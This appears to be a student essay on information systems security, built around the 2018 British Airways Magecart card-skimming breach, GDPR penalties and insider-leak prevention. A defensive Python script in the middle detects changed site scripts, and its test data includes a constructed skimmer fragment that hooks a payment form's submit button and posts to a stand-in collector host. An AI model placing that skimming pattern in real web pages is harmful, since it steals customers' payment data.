
Information Systems security is one of the biggest challenges facing society's
technological age. Information Systems have become an integral part of everyday life in the
home, businesses, government, and organizations. Information Systems have changed the way
that people live their lives, conduct business, and even run the government. Information Systems
have become such an important part of everyday life because there are many uses of
Information Systems that make it much easier and faster to perform certain tasks, or even to
perform several tasks simultaneously. Information Systems have become highly developed and
detailed in their short history. Society has developed along with Information Systems,
becoming a more technologically reliant generation, also known as the digital firm era. Along
with an increasing reliance on Information Systems, the digital firm era has also brought
about increasing profitability, competitiveness, and efficiency for any business of any size
that uses an Information System.

Information security must be included as part of an organisation's operating processes
to ensure that it is implemented in practice. Its incorporation into processes requires good
cooperation from information security management, personnel responsible for information
security, information system owners and service providers. Measures that increase information
security should be taken into account when processes are planned to ensure that security
requirements are fulfilled.

An organisation's strategy is managed by means of a management system, which covers
the detailed organisation of information security as well as information security policies,
planning, responsibilities, procedures, processes and the necessary resources (Bizfluent, 2018).
A management system assists in monitoring and assessing the effectiveness and
appropriateness of information security measures. By continuously developing the system, it
is possible to improve the organisation's preparedness to systematically manage its information
security.

Computer crime and computer abuse have become a widespread problem since the
evolution of Information Systems. Before Information Systems were invented, data was
better protected because most information was stored only in paper files, and only in certain
departments of a business, where most users would not have access to the data. With the
evolution of Information Systems, large amounts of data can be stored in electronic form rather
than in paper files, so the data can be viewed by a larger number of users. Since more users
can access the data electronically rather than manually, the data is in turn more susceptible to
the threat of computer crime and computer abuse.

Many businesses and individuals feel serious effects from the computer crime and
computer abuse problems described below. Often, the users of Information Systems depend
so heavily on the systems that a small disruption will cause huge setbacks for the business
or individual. Lasting from a few minutes to a few days, the side effects of computer crime and
computer abuse can be damaging to a business or individual who relies heavily on Information
Systems to accomplish everyday tasks.

The current computer crime and computer abuse problems threaten Information
Systems because of the increased reliance of businesses and individuals on Information Systems,
but also because of an increased risk of attack through insecure telecommunication networks.
Many of the ordinary threats to Information Systems, such as hardware failure, fire, software
failure, electrical problems, personnel actions, user errors, and telecommunication problems,
can also open up easier access to large volumes of data. When the telecommunication network
itself is threatened, the Information Systems of an individual or business become even more
threatened.

Information systems security refers to the processes and methodologies involved in
keeping information private and accessible and in preserving its integrity. It also covers access
controls, which prevent unauthorised people from entering a system or retrieving data from it;
defending information no matter where that information is; and detecting and remediating
security breaches, as well as documenting those events. As the use of the internet and related
telecommunications technologies and systems has become unavoidable, the use of these networks
has created a new vulnerability for organisations and companies. These networks can be intruded
upon or disrupted in several ways. As a result, organisations and companies face threats that
affect the security of their information systems and leave them vulnerable. Threats to an
information system can come from a variety of places, both inside and external to an
organisation or company. To secure the system and its information, each company or
organisation should analyse the types of threats that it will face and how those threats affect
information system security. Examples of threats include unauthorised access by hackers and
crackers, computer viruses, theft, sabotage, vandalism and accidents. Hackers are unauthorised
persons who use the latest technology and their skills to break into or disable a computer they
are not authorised to use, while crackers are persons who gain access to an information system
for malicious reasons (Essay, 2016).

Threats may be aimed at a network from several different aspects of the network. Thus,
while one hacker may intrude into an application and divert financial transactions to a fictitious
account, another intruder may attack the performance of the network and render it virtually
unusable. The most important sources of threats are outside and inside threats. Outside
threats are terrorism, hackers, malfeasants, former employees, foreign political espionage,
economic espionage by foreign governments or foreign or domestic corporations, and liability
lawsuits, while inside threats include employees, hackers, mischief, legal issues, and
uneducated users (Ghosh, 2002). According to the Identity Theft Resource Center, over 22
million records were exposed up to July 2018. In 2018, more than 600 data breaches were
reported. A data breach is the intentional or unintentional release of secure or
private/confidential information to an untrusted environment. Other terms for this
phenomenon include unintentional information disclosure, data leak and data spill. These
incidents have happened to many big-name organisations, including Under Armour, Facebook,
Uber and British Airways.

British Airways (BA) is the largest airline in the United Kingdom based on fleet size,
or the second largest, behind easyJet, when measured by passengers carried. The airline is
based in Waterside, near its main hub at London Heathrow Airport. In January 2011 BA
merged with Iberia, creating the International Airlines Group (IAG), a holding
company registered in Madrid, Spain. IAG is the world's third-largest airline group in terms of
annual revenue and the second-largest in Europe. It is listed on the London Stock Exchange and
in the FTSE 100 Index. BA was created in 1974 after a British Airways Board was established
by the British government to manage the two nationalised airline corporations, British
Overseas Airways Corporation and British European Airways, and two regional
airlines, Cambrian Airways from Cardiff and Northeast Airlines from Newcastle upon Tyne.
On 31 March 1974, all four companies were merged to form British Airways. After almost 13
years as a state company, BA was privatised in February 1987 as part of a wider privatisation
plan by the Conservative government. The carrier expanded with the acquisition of British
Caledonian in 1987, Dan-Air in 1992, and British Midland International in 2012. On 7
September 2018, British Airways disclosed a data breach impacting customer information
from roughly 380,000 booking transactions made between August 21 and September 5 of this
year (Lily, 2018). The company said that names, addresses, email addresses, and sensitive
payment card details were all compromised.

Researchers from the threat detection firm RiskIQ have shed new light on how the
attackers pulled off the heist. RiskIQ published details tracking the British Airways hackers'
strategy on Tuesday, also linking the intrusion to a criminal hacking gang that has been active
since 2015. The group, which RiskIQ calls Magecart, is known for web-based credit card
skimming: finding websites that do not secure payment data entry forms and vacuuming up
everything that gets submitted. But while Magecart has previously been known to use the same
broadly targeted code to scoop up data from various third-party processors, RiskIQ found that
the attack on British Airways was much more tailored to the company's specific infrastructure.
In its initial disclosure, British Airways said that the breach did not impact passport numbers
or other travel data. However, the company later clarified that the compromised data included
payment card expiration dates and Card Verification Value codes, the extra three- or four-digit
numbers that authenticate a card, even though British Airways has said it does not store CVVs.
British Airways further noted that the breach only impacted customers who completed
transactions during a specific timeframe, from 22:58 BST on August 21 to 21:45 BST on
September 5.

These details served as clues, leading analysts at RiskIQ and elsewhere to suspect that
the British Airways hackers likely used a "cross-site scripting" attack, in which bad actors
identify a poorly secured web page component and inject their own code into it to alter a victim
site's behavior. The attack doesn't necessarily involve penetrating an organization's network or
servers, which would explain how the hackers accessed only information submitted during a very
specific timeframe, and compromised data that British Airways itself doesn't store. Klijnsma,
who pinned the recent Ticketmaster breach on Magecart and saw similarities with the British
Airways situation, started looking through RiskIQ's catalog of public web data; the company
crawls more than two billion pages per day. He identified all the unique scripts on the British
Airways website, which would be the targets of a cross-site scripting attack, and then tracked
them through time until he found one JavaScript component that had been modified right
around the time the airline said the attack began. The script is connected to the British Airways
baggage claim information page; the last time it had been modified prior to the breach was
December 2012. Klijnsma quickly noticed that the attackers had revised the component to include
code, just 22 lines of it, of a kind often used in clandestine manipulations.

The malicious code grabbed the data that customers entered into a payment form and sent it to
an attacker-controlled server when a user clicked or tapped the submission button. The attackers
even paid to set up a Secure Sockets Layer certificate for their server, a credential that confirms
a server has web encryption enabled to protect data in transit. Attackers of all sorts
have increasingly used these certificates to help create an air of legitimacy, even though an
encrypted site is not necessarily safe. The airline also said in its disclosure that the attack
impacted its mobile users. Klijnsma found a part of the British Airways Android app built off
the same code as the compromised portion of the airline's website. It's normal for an app's
functionality to be based in part on existing web infrastructure, but the practice can also create
shared risk. In the case of the British Airways Android app, the malicious JavaScript
component the attackers injected on the main site hit the mobile app as well. The attackers seem to
have designed the script to accommodate touchscreen inputs.

While the attack wasn't elaborate, it was effective, because it was tailored to the specific
scripting and data flow weaknesses of the British Airways site. RiskIQ says it is attributing the
incident to Magecart because the skimmer code injected into the British Airways website is a
modified version of the group's hallmark script. RiskIQ also views the attack as an evolution
of the techniques used in the recent Ticketmaster breach, which RiskIQ linked to Magecart,
though with the added innovation of directly targeting a victim's site rather than compromising
a third party.
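The investigation described above amounts to a check a site owner can automate: hash every first-party script, report the ones whose hash changed since the last capture, and look in the added lines for the two traits of the skimmer (an outbound host the site never talks to, and a hook on the submission button's click and touch events). The following is an added example and not code from the article, from RiskIQ or from British Airways; the script paths, their contents and the host names are constructed stand-ins.

```python
import base64
import difflib
import hashlib
import re
from urllib.parse import urlparse

# Constructed example: a site's first-party scripts as captured at two crawl
# times. Paths, contents and hosts are hypothetical stand-ins, not British
# Airways code and not RiskIQ's data.
BASELINE_SCRIPTS = {
    "/js/baggage-info.js": "function showBaggage(){return 'baggage rules';}\n",
    "/js/booking.js": "function book(){return fetch('/api/book');}\n",
}
LATEST_SCRIPTS = {
    "/js/baggage-info.js": (
        "function showBaggage(){return 'baggage rules';}\n"
        "var b=document.getElementById('submitButton');\n"
        "b.addEventListener('mouseup', send); b.addEventListener('touchend', send);\n"
        "function send(){fetch('https://collector.invalid/gateway/', {method:'POST'});}\n"
    ),
    "/js/booking.js": "function book(){return fetch('/api/book');}\n",
}

# Hosts the site is expected to contact (an assumption of this example).
ALLOWED_HOSTS = {"www.example-airline.invalid", "api.example-airline.invalid"}
URL_RE = re.compile(r"https?://[^\s'\"()]+")
INPUT_EVENTS = ("submit", "click", "mouseup", "touchend")

def sri_hash(content: str) -> str:
    """Subresource Integrity value (sha384-<base64>) for a script body."""
    digest = hashlib.sha384(content.encode()).digest()
    return "sha384-" + base64.b64encode(digest).decode()

def added_lines(old: str, new: str) -> list:
    """Lines present in the new version of a script but not in the old one."""
    diff = difflib.unified_diff(old.splitlines(), new.splitlines(), lineterm="", n=0)
    # Skip the two '---'/'+++' file header lines, then keep the '+' lines.
    return [l[1:] for l in list(diff)[2:] if l.startswith("+")]

def unknown_hosts(lines) -> set:
    """Hosts named by absolute URLs in the lines that are not on the allow-list."""
    hosts = {urlparse(u).hostname for line in lines for u in URL_RE.findall(line)}
    return {h for h in hosts if h and h not in ALLOWED_HOSTS}

def review_scripts(baseline: dict, latest: dict) -> dict:
    """Report each script whose hash changed: its new SRI hash, unknown outbound
    hosts in the added lines, and whether the added lines hook user-input
    events (the two traits of the skimmer described in the article)."""
    findings = {}
    for path, new_body in latest.items():
        old_body = baseline.get(path, "")
        if sri_hash(old_body) == sri_hash(new_body):
            continue  # unchanged: an integrity attribute would still match
        new = added_lines(old_body, new_body)
        findings[path] = {
            "new_integrity": sri_hash(new_body),
            "unknown_hosts": sorted(unknown_hosts(new)),
            "hooks_input_events": any(f"'{e}'" in line for line in new for e in INPUT_EVENTS),
        }
    return findings

if __name__ == "__main__":
    for path, finding in review_scripts(BASELINE_SCRIPTS, LATEST_SCRIPTS).items():
        print(path, finding)
```

Publishing the `sha384-...` value as the `integrity` attribute of the script tag makes the browser refuse a modified copy outright, which is the preventive counterpart of this after-the-fact check.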

The update to the General Data Protection Regulation (GDPR) stipulates that firms must
report a breach within 72 hours. It took British Airways just one day to announce it had been
hit by a cyber-attack between 21 August and 5 September (Kate, 2018). Despite BA's quick
reporting of the breach, experts think the airline could be hit by a huge fine under the GDPR,
which came into force on May 25. Previously, the largest fine issued by the Information
Commissioner's Office (ICO) was £500,000. But under GDPR, firms can be fined up to 4% of
turnover, which in this case would be £500 million. If the airline's parent group, International
Airlines Group (IAG), is held accountable instead, the number could be even higher. The fines are
in addition to any compensation BA needs to pay to customers who might have suffered financial
fraud because of the breach. But the costs do not end there: BA has been threatened with a £500
million class-action lawsuit in a UK court by the law firm SPG Law. It alleges BA is liable to
compensate for non-material damage under the Data Protection Act 2018, the UK's
implementation of GDPR. The airline has already pledged to cover any losses suffered by its
customers, but SPG Law says that under GDPR, breach victims have a right to further
compensation of £1,250 each. It is clear BA is becoming a test case for the fines under GDPR.

A security breach may let out secrets and proprietary information that can damage an
organisation's reputation, business, or finances. With so much data stored digitally today, most
firms tend to focus their security efforts on stopping hackers and others from getting in (Andrez,
2016). Unfortunately, an organisation's biggest security risk may not come from the outside, but
from the inside, in the form of current and former partners and employees. The first action to take
to prevent a data breach is to control employees' access to data from the beginning. One of the
best ways to prevent data leaks after people leave is simply not to give them access in the first
place. Everyone who works for an organisation should only have access to the files and data
that are necessary to do their jobs. The employer still has to worry if a partner or someone else
higher up leaves, but it is easier to retrieve data from just a few people than from everyone at
the firm. Second, use only firm-based devices and systems. As mentioned, this can be a tough
one with the various ways we access information in this day and age, but it still can be done.
Do not let employees use their own personal email. This may be obvious, but it is extremely
important. By insisting that everyone only use work email, the organisation can control an
employee's access to what they receive and send throughout the workday. It also makes
removing an employee from the firm's information database easy. If the employer has the budget
to provide employees with a firm-owned mobile device, this can alleviate issues with them
putting sensitive data on their personal phone. Then, when they leave, the employer can simply
take back the phone, and all of the data contained on it. It is also easier to install security
measures on firm-owned devices that can help the employer locate them or wipe the data if
necessary.

The third idea for overcoming a data breach is to have a plan in place. If an organisation
consistently keeps security as a top priority, it will be easier to identify a breach of information
and address it quickly. According to a 2013 American Bar Association study, 70% of law firms
said they were not sure if their firm's security had ever been breached. Knowing when your
information is in the wrong hands will help you get that information back and identify the
culprits. Always educate employees on how to keep their information safe and how to know when
they have been the victims of stolen information. This can be done through workshops,
educational videos, or phishing drills. Then, always review the organisation's security policies
with each client, and constantly communicate if or when you may need to share certain pieces
of personal information. Besides this, keep track of who has shared confidential
information about the clients or the firm, and for what purpose. If that information is later shared
with an unauthorised individual, the organisation will have a better idea of where the breach
happened. Having these measures in place is not just a good way to protect and store data; it
also proves to clients and partners that the firm is serious, forward thinking, and committed
to the safety and security of everyone it works with.

Then, there are a few measures that organisations should take into account to
enhance the information system's security. First, employers should support cyber security staff.
Cyber security staff often cite a lack of organisational support as their biggest concern. By that,
they usually mean that they are not given a sufficient budget or that senior staff do not listen to
their requests. These problems are clearly linked. Senior staff are generally not cyber security
experts, and they often assume the field is little more than IT problems. However, cyber
security affects every part of an organisation, from its staff to its physical premises, and it is
essential that organisations' board rooms acknowledge that and give staff appropriate budgets.
Secondly, staff awareness courses should be conducted annually. Two of the biggest threats
organisations face are phishing and ransomware, both of which exploit human error. If
employees who receive phishing emails, which often contain ransomware, are unable to spot
them, the whole organisation is at risk. Similarly, accidental breaches, privilege misuse and
data loss are all the result of employees not understanding their information security
obligations. Educating staff on the ways they could put data at risk helps organisations turn one
of their biggest vulnerabilities into an area of strength. Training courses should be given to
employees during their induction and then repeated annually. Thirdly, policies and procedures
should be reviewed regularly. Policies and procedures are the documents that establish an
organisation's rules for handling data. Policies provide a broad outline of the organisation's
principles, whereas procedures detail how, what and when things should be done. The evolving
cyber threat landscape makes it imperative that organisations regularly review their policies
and procedures. If a procedure is not working, it needs to be rewritten.

In conclusion, information systems security is one of the biggest challenges facing our
society in the technological age. Information systems have become an integral part of everyday
life in the home, businesses, government, and private organizations. Information systems have
changed the way that people live their lives, conduct business, and even how the government is
run. Information systems have become such an important part of everyday life because there are
many uses of information systems that make it much easier and faster to perform certain tasks,
or even to perform several tasks simultaneously. With the great abilities that this technology
provides us, we are burdened with an ethical and moral obligation to manage and control ourselves
as well as others for the greater good of mankind.
References

Bizfluent (June 2018). Role Of Information System In An Organization. Retrieved from
https://bizfluent.com/about-6525978-role-information-systems-organization.html

Essays, UK. (November 2013). The Threats Of Information System Security Information
Technology Essay. Retrieved from https://www.ukessays.com/essays/information-
technology/the-threats-of-information-system-security-information-technology-
essay.php?vref=1

Ghosh, S. (2002). Principles of Secure Network Systems Design. New York: Springer Science
+ Business Media.

Lily Hay Newman (September 2018). How Hackers Slipped By British Airways' Defences.
Retrieved from https://www.wired.com/story/british-airways-hack-details/

Kate O'Flaherty (September 2018). How The British Airways Breach Will Reveal The True
Cost Of GDPR. Retrieved from https://www.forbes.com/

Andrez Hernandez (July 2016). How To Prevent A Security Breach. Retrieved from
https://www.lawtechnologytoday.org/2016/07/how-to-prevent-a-security-breach/
